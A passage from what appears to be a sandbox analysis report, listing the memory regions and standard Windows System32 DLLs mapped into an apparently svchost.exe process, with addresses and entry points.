filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1408
start_va = 0x779d0000
end_va = 0x779d6fff
monitored = 0
entry_point = 0x779d106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 1409
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1410
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1411
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1412
start_va = 0xff300000
end_va = 0xff30afff
monitored = 0
entry_point = 0xff30246c
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 1413
start_va = 0x7fef07b0000
end_va = 0x7fef0a02fff
monitored = 0
entry_point = 0x7fef07b236c
region_type = mapped_file
name = "wuaueng.dll"
filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll")
Region:
id = 1414
start_va = 0x7fef1290000
end_va = 0x7fef12d4fff
monitored = 0
entry_point = 0x7fef12c3644
region_type = mapped_file
name = "upnp.dll"
filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll")
Region:
id = 1415
start_va = 0x7fef12e0000
end_va = 0x7fef12f1fff
monitored = 0
entry_point = 0x7fef12e90bc
region_type = mapped_file
name = "bitsigd.dll"
filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll")
Region:
id = 1416
start_va = 0x7fef13c0000
end_va = 0x7fef13cefff
monitored = 0
entry_point = 0x7fef13c9a48
region_type = mapped_file
name = "mspatcha.dll"
filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll")
Region:
id = 1417
start_va = 0x7fef26e0000
end_va = 0x7fef2959fff
monitored = 0
entry_point = 0x7fef2712200
region_type = mapped_file
name = "esent.dll"
filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll")
Region:
id = 1418
start_va = 0x7fef2b60000
end_va = 0x7fef2b69fff
monitored = 0
entry_point = 0x7fef2b63994
region_type = mapped_file
name = "bitsperf.dll"
filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll")
Region:
id = 1419
start_va = 0x7fef4120000
end_va = 0x7fef413bfff
monitored = 0
entry_point = 0x7fef41211a0
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")
Region:
id = 1420
start_va = 0x7fef4140000
end_va = 0x7fef41a1fff
monitored = 0
entry_point = 0x7fef4141198
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")
Region:
id = 1421
start_va = 0x7fef41b0000
end_va = 0x7fef41e9fff
monitored = 0
entry_point = 0x7fef41b1010
region_type = mapped_file
name = "mprapi.dll"
filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll")
Region:
id = 1422
start_va = 0x7fef4890000
end_va = 0x7fef4900fff
monitored = 0
entry_point = 0x7fef48cecc4
region_type = mapped_file
name = "winspool.drv"
filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")
Region:
id = 1423
start_va = 0x7fef4980000
end_va = 0x7fef499cfff
monitored = 0
entry_point = 0x7fef4982f18
region_type = mapped_file
name = "mmcss.dll"
filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll")
Region:
id = 1424
start_va = 0x7fef4bf0000
end_va = 0x7fef4bfbfff
monitored = 0
entry_point = 0x7fef4bf602c
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 1425
start_va = 0x7fef4e30000
end_va = 0x7fef4ea0fff
monitored = 0
entry_point = 0x7fef4e751d0
region_type = mapped_file
name = "wbemess.dll"
filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")
Region:
id = 1426
start_va = 0x7fef4eb0000
end_va = 0x7fef4ec1fff
monitored = 0
entry_point = 0x7fef4eb89d0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 1427
start_va = 0x7fef4ed0000
end_va = 0x7fef4f84fff
monitored = 0
entry_point = 0x7fef4f4cf80
region_type = mapped_file
name = "wmiprvsd.dll"
filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")
Region:
id = 1428
start_va = 0x7fef4f90000
end_va = 0x7fef4f97fff
monitored = 0
entry_point = 0x7fef4f91414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 1429
start_va = 0x7fef4fa0000
end_va = 0x7fef4ff9fff
monitored = 0
entry_point = 0x7fef4fddde0
region_type = mapped_file
name = "repdrvfs.dll"
filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")
Region:
id = 1430
start_va = 0x7fef5000000
end_va = 0x7fef5020fff
monitored = 0
entry_point = 0x7fef50103b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 1431
start_va = 0x7fef5030000
end_va = 0x7fef509afff
monitored = 0
entry_point = 0x7fef5074344
region_type = mapped_file
name = "hnetcfg.dll"
filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")
Region:
id = 1432
start_va = 0x7fef50a0000
end_va = 0x7fef50b2fff
monitored = 0
entry_point = 0x7fef50a1d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 1433
start_va = 0x7fef50c0000
end_va = 0x7fef5121fff
monitored = 0
entry_point = 0x7fef50fbd80
region_type = mapped_file
name = "esscli.dll"
filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")
Region:
id = 1434
start_va = 0x7fef5130000
end_va = 0x7fef525bfff
monitored = 0
entry_point = 0x7fef51e0ef0
region_type = mapped_file
name = "wbemcore.dll"
filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")
Region:
id = 1435
start_va = 0x7fef5260000
end_va = 0x7fef5279fff
monitored = 0
entry_point = 0x7fef5273fbc
region_type = mapped_file
name = "nci.dll"
filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")
Region:
id = 1436
start_va = 0x7fef5280000
end_va = 0x7fef5303fff
monitored = 0
entry_point = 0x7fef52d1118
region_type = mapped_file
name = "netcfgx.dll"
filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll")
Region:
id = 1437
start_va = 0x7fef5310000
end_va = 0x7fef531dfff
monitored = 0
entry_point = 0x7fef5315500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 1438
start_va = 0x7fef5320000
end_va = 0x7fef5346fff
monitored = 0
entry_point = 0x7fef53211a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 1439
start_va = 0x7fef5350000
end_va = 0x7fef5422fff
monitored = 0
entry_point = 0x7fef53c8b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 1440
start_va = 0x7fef5470000
end_va = 0x7fef5488fff
monitored = 0
entry_point = 0x7fef5471104
region_type = mapped_file
name = "resutils.dll"
filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")
Region:
id = 1441
start_va = 0x7fef5490000
end_va = 0x7fef54dffff
monitored = 0
entry_point = 0x7fef5491190
region_type = mapped_file
name = "clusapi.dll"
filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")
Region:
id = 1442
start_va = 0x7fef54e0000
end_va = 0x7fef54e7fff
monitored = 0
entry_point = 0x7fef54e1020
region_type = mapped_file
name = "sscore.dll"
filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")
Region:
id = 1443
start_va = 0x7fef54f0000
end_va = 0x7fef5514fff
monitored = 0
entry_point = 0x7fef5508c54
region_type = mapped_file
name = "browser.dll"
filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll")
Region:
id = 1444
start_va = 0x7fef5520000
end_va = 0x7fef555cfff
monitored = 0
entry_point = 0x7fef5521070
region_type = mapped_file
name = "srvsvc.dll"
filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")
Region:
id = 1445
start_va = 0x7fef5560000
end_va = 0x7fef55a6fff
monitored = 0
entry_point = 0x7fef5561040
region_type = mapped_file
name = "wdscore.dll"
filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")
Region:
id = 1446
start_va = 0x7fef55b0000
end_va = 0x7fef55f1fff
monitored = 0
entry_point = 0x7fef55b17e4
region_type = mapped_file
name = "sqmapi.dll"
filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")
Region:
id = 1447
start_va = 0x7fef5600000
end_va = 0x7fef5610fff
monitored = 0
entry_point = 0x7fef56014c0
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 1448
start_va = 0x7fef5620000
end_va = 0x7fef56b1fff
monitored = 0
entry_point = 0x7fef56951ec
region_type = mapped_file
name = "iphlpsvc.dll"
filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")
Region:
id = 1449
start_va = 0x7fef56c0000
end_va = 0x7fef5736fff
monitored = 0
entry_point = 0x7fef56fe7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 1450
start_va = 0x7fef5740000
end_va = 0x7fef5779fff
monitored = 0
entry_point = 0x7fef575d020
region_type = mapped_file
name = "wmisvc.dll"
filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")
Region:
id = 1451
start_va = 0x7fef5960000
end_va = 0x7fef5970fff
monitored = 0
entry_point = 0x7fef5969e7c
region_type = mapped_file
name = "ssdpapi.dll"
filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll")
Region:
id = 1452
start_va = 0x7fef5a10000
end_va = 0x7fef5a73fff
monitored = 0
entry_point = 0x7fef5a11254
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 1453
start_va = 0x7fef5a80000
end_va = 0x7fef5af0fff
monitored = 0
entry_point = 0x7fef5a81010
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1454
start_va = 0x7fef5b90000
end_va = 0x7fef5ba6fff
monitored = 0
entry_point = 0x7fef5b91060
region_type = mapped_file
name = "vsstrace.dll"
filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")
Region:
id = 1455
start_va = 0x7fef5bb0000
end_va = 0x7fef5d5ffff
monitored = 0
entry_point = 0x7fef5bb1010
region_type = mapped_file
name = "vssapi.dll"
filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")
Region:
id = 1456
start_va = 0x7fef6a50000
end_va = 0x7fef6ac3fff
monitored = 0
entry_point = 0x7fef6a566f0
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 1457
start_va = 0x7fef7f60000
end_va = 0x7fef7f7afff
monitored = 0
entry_point = 0x7fef7f61198
region_type = mapped_file
name = "cabinet.dll"
filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")
Region:
id = 1458
start_va = 0x7fef8080000
end_va = 0x7fef8088fff
monitored = 0
entry_point = 0x7fef80811a0
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 1459
start_va = 0x7fef82c0000
end_va = 0x7fef8391fff
monitored = 0
entry_point = 0x7fef8351a10
region_type = mapped_file
name = "qmgr.dll"
filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll")
Region:
id = 1460
start_va = 0x7fef8840000
end_va = 0x7fef8856fff
monitored = 0
entry_point = 0x7fef8849d50
region_type = mapped_file
name = "ncprov.dll"
filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll")
Region:
id = 1461
start_va = 0x7fef8d20000
end_va = 0x7fef8d96fff
monitored = 0
entry_point = 0x7fef8d2afd0
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 1462
start_va = 0x7fef8df0000
end_va = 0x7fef8eddfff
monitored = 0
entry_point = 0x7fef8df12a0
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 1463
start_va = 0x7fef8ee0000
end_va = 0x7fef8ee9fff
monitored = 0
entry_point = 0x7fef8ee260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 1464
start_va = 0x7fef8ef0000
end_va = 0x7fef9001fff
monitored = 0
entry_point = 0x7fef8f0f354
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 1465
start_va = 0x7fef9010000
end_va = 0x7fef901efff
monitored = 0
entry_point = 0x7fef9017e80
region_type = mapped_file
name = "wiarpc.dll"
filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll")
Region:
id = 1466
start_va = 0x7fef9020000
end_va = 0x7fef9028fff
monitored = 0
entry_point = 0x7fef9023668
region_type = mapped_file
name = "fvecerts.dll"
filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll")
Region:
id = 1467
start_va = 0x7fef9030000
end_va = 0x7fef9038fff
monitored = 0
entry_point = 0x7fef9031020
region_type = mapped_file
name = "tbs.dll"
filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll")
Region:
id = 1468
start_va = 0x7fef9040000
end_va = 0x7fef9095fff
monitored = 0
entry_point = 0x7fef9041040
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 1469
start_va = 0x7fef90a0000
end_va = 0x7fef90fdfff
monitored = 0
entry_point = 0x7fef90a9024
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 1470
start_va = 0x7fef9100000
end_va = 0x7fef9117fff
monitored = 0
entry_point = 0x7fef9101bf8
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1471
start_va = 0x7fef9120000
end_va = 0x7fef9130fff
monitored = 0
entry_point = 0x7fef91216ac
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1472
start_va = 0x7fef9150000
end_va = 0x7fef91a2fff
monitored = 0
entry_point = 0x7fef9152b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 1473
start_va = 0x7fef98b0000
end_va = 0x7fef98f1fff
monitored = 0
entry_point = 0x7fef98e0048
region_type = mapped_file
name = "tcpipcfg.dll"
filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll")
Region:
id = 1474
start_va = 0x7fef9900000
end_va = 0x7fef9919fff
monitored = 0
entry_point = 0x7fef9911ae4
region_type = mapped_file
name = "rascfg.dll"
filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll")
Region:
id = 1475
start_va = 0x7fef9940000
end_va = 0x7fef994efff
monitored = 0
entry_point = 0x7fef9946894
region_type = mapped_file
name = "ndiscapcfg.dll"
filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll")
Region:
id = 1476
start_va = 0x7fefb210000
end_va = 0x7fefb223fff
monitored = 0
entry_point = 0x7fefb213e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 1477
start_va = 0x7fefb230000
end_va = 0x7fefb23afff
monitored = 0
entry_point = 0x7fefb231198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1478
start_va = 0x7fefb240000
end_va = 0x7fefb266fff
monitored = 0
entry_point = 0x7fefb2498bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1479
start_va = 0x7fefb270000
end_va = 0x7fefb2d6fff
monitored = 0
entry_point = 0x7fefb286060
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 1480
start_va = 0x7fefb2f0000
end_va = 0x7fefb2fafff
monitored = 0
entry_point = 0x7fefb2f4f8c
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 1481
start_va = 0x7fefb300000
end_va = 0x7fefb30bfff
monitored = 0
entry_point = 0x7fefb3015d8
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 1482
start_va = 0x7fefb310000
end_va = 0x7fefb31ffff
monitored = 0
entry_point = 0x7fefb31835c
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 1483
start_va = 0x7fefb320000
end_va = 0x7fefb338fff
monitored = 0
entry_point = 0x7fefb3211a8
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 1484
start_va = 0x7fefb340000
end_va = 0x7fefb376fff
monitored = 0
entry_point = 0x7fefb348424
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 1485
start_va = 0x7fefb3c0000
end_va = 0x7fefb3d4fff
monitored = 0
entry_point = 0x7fefb3c60d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1486
start_va = 0x7fefb3e0000
end_va = 0x7fefb4a1fff
monitored = 0
entry_point = 0x7fefb3e101c
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 1487
start_va = 0x7fefb6e0000
end_va = 0x7fefb6e8fff
monitored = 0
entry_point = 0x7fefb6e1010
region_type = mapped_file
name = "avrt.dll"
filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll")
Region:
id = 1488
start_va = 0x7fefb920000
end_va = 0x7fefb933fff
monitored = 0
entry_point = 0x7fefb9216b4
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 1489
start_va = 0x7fefb940000
end_va = 0x7fefb954fff
monitored = 0
entry_point = 0x7fefb941050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 1490
start_va = 0x7fefb960000
end_va = 0x7fefb96bfff
monitored = 0
entry_point = 0x7fefb9618a4
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 1491
start_va = 0x7fefb970000
end_va = 0x7fefb985fff
monitored = 0
entry_point = 0x7fefb9711a0
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 1492
start_va = 0x7fefbaa0000
end_va = 0x7fefbab0fff
monitored = 0
entry_point = 0x7fefbaa1070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 1493
start_va = 0x7fefbc00000
end_va = 0x7fefbc34fff
monitored = 0
entry_point = 0x7fefbc01064
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 1494
start_va = 0x7fefc070000
end_va = 0x7fefc0c5fff
monitored = 0
entry_point = 0x7fefc07bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1495
start_va = 0x7fefc0d0000
end_va = 0x7fefc1fbfff
monitored = 0
entry_point = 0x7fefc0d94bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1496
start_va = 0x7fefc200000
end_va = 0x7fefc21cfff
monitored = 0
entry_point = 0x7fefc201ef4
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 1497
start_va = 0x7fefc250000
end_va = 0x7fefc443fff
monitored = 0
entry_point = 0x7fefc3dc924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 1498
start_va = 0x7fefc740000
end_va = 0x7fefc76cfff
monitored = 0
entry_point = 0x7fefc741010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1499
start_va = 0x7fefc910000
end_va = 0x7fefc91bfff
monitored = 0
entry_point = 0x7fefc911064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1500
start_va = 0x7fefc920000
end_va = 0x7fefc9dafff
monitored = 0
entry_point = 0x7fefc926de0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 1501
start_va = 0x7fefc9e0000
end_va = 0x7fefc9e6fff
monitored = 0
entry_point = 0x7fefc9e14b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 1502
start_va = 0x7fefcad0000
end_va = 0x7fefcaeafff
monitored = 0
entry_point = 0x7fefcad2068
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1503
start_va = 0x7fefcaf0000
end_va = 0x7fefcb0dfff
monitored = 0
entry_point = 0x7fefcaf13b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1504
start_va = 0x7fefcb10000
end_va = 0x7fefcb21fff
monitored = 0
entry_point = 0x7fefcb11060
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 1505
start_va = 0x7fefcb30000
end_va = 0x7fefcb4efff
monitored = 0
entry_point = 0x7fefcb35c68
region_type = mapped_file
name = "spinf.dll"
filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll")
Region:
id = 1506
start_va = 0x7fefcc00000
end_va = 0x7fefcc38fff
monitored = 0
entry_point = 0x7fefcc0c0f0
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 1507
start_va = 0x7fefcc40000
end_va = 0x7fefcc49fff
monitored = 0
entry_point = 0x7fefcc43cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 1508
start_va = 0x7fefcc50000
end_va = 0x7fefcc5cfff
monitored = 0
entry_point = 0x7fefcc51348
region_type = mapped_file
name = "pcwum.dll"
filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")
Region:
id = 1509
start_va = 0x7fefcd40000
end_va = 0x7fefcd86fff
monitored = 0
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1510
start_va = 0x7fefce30000
end_va = 0x7fefce5ffff
monitored = 0
entry_point = 0x7fefce3194c
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 1511
start_va = 0x7fefce60000
end_va = 0x7fefcebafff
monitored = 0
entry_point = 0x7fefce66940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1512
start_va = 0x7fefcfd0000
end_va = 0x7fefcfd6fff
monitored = 0
entry_point = 0x7fefcfd142c
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 1513
start_va = 0x7fefcfe0000
end_va = 0x7fefd034fff
monitored = 0
entry_point = 0x7fefcfe1054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1514
start_va = 0x7fefd040000
end_va = 0x7fefd057fff
monitored = 0
entry_point = 0x7fefd043b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1515
start_va = 0x7fefd150000
end_va = 0x7fefd181fff
monitored = 0
entry_point = 0x7fefd15144c
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 1516
start_va = 0x7fefd190000
end_va = 0x7fefd1b1fff
monitored = 0
entry_point = 0x7fefd195d30
region_type = mapped_file
name = "bcrypt.dll"
